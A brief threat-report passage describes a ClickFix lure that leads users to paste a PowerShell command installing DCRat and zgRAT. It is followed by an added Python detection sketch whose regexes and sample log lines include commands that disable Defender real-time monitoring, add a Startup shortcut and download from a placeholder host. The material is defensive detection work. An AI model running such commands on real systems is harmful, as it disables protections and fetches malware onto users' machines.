The message includes URLs that direct users to a landing page promising a credit-cardless experience. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears. If the user copies and pastes as instructed, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, silences error messages to hide malicious activity, establishes persistence by creating a shortcut in a user’s Startup folder, and downloads and installs DCRat and zgRAT.
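A detection sketch for the script behaviour described above, as an added example that is not from the original report: it tags PowerShell script-block text (for example Event ID 4104) with the four behaviours the paragraph names and flags a process only when several co-occur. The regex patterns, event field names, hosts and sample lines are assumptions constructed for illustration, not indicators from the campaign.

```python
import re

# Behaviours the paragraph attributes to the script, as regexes over
# PowerShell script-block text. Patterns are illustrative assumptions,
# not indicators taken from the campaign.
BEHAVIOURS = {
    "defender_tamper": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I),
    "error_silencing": re.compile(
        r"\$ErrorActionPreference\s*=\s*['\"]?SilentlyContinue|"
        r"-ErrorAction\s+SilentlyContinue", re.I),
    "startup_shortcut": re.compile(
        r"(Start Menu\\Programs\\Startup|GetFolderPath\(['\"]Startup['\"]\)).*\.lnk",
        re.I | re.S),
    "remote_download": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer)\b|"
        r"\.Download(String|File|Data)\(", re.I),
}

def match_behaviours(script_text):
    """Return the sorted names of behaviours found in one script block."""
    return sorted(n for n, rx in BEHAVIOURS.items() if rx.search(script_text))

def triage(events, threshold=3):
    """Group script blocks by (host, pid) and flag processes where at least
    `threshold` distinct behaviours co-occur; each alone is common in admin scripts."""
    seen = {}
    for ev in events:
        seen.setdefault((ev["host"], ev["pid"]), set()).update(match_behaviours(ev["text"]))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}

SAMPLE_EVENTS = [  # constructed sample data, not captured from the campaign
    {"host": "ws-014", "pid": 4312, "text": "$ErrorActionPreference = 'SilentlyContinue'"},
    {"host": "ws-014", "pid": 4312, "text": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "ws-014", "pid": 4312,
     "text": "$s = \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\placeholder.lnk\""},
    {"host": "ws-014", "pid": 4312,
     "text": "Invoke-WebRequest -Uri https://example.invalid/placeholder -OutFile $p"},
    {"host": "ws-022", "pid": 977, "text": "Get-ChildItem C:\\Logs -ErrorAction SilentlyContinue"},
    {"host": "ws-022", "pid": 977, "text": "Invoke-RestMethod https://example.invalid/api/health"},
]

if __name__ == "__main__":
    for (host, pid), hits in triage(SAMPLE_EVENTS).items():
        print(f"{host} pid={pid}: {', '.join(hits)}")
```

Requiring co-occurrence keeps routine scripts that only suppress errors or fetch a URL, like the second constructed process, below the alert threshold.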
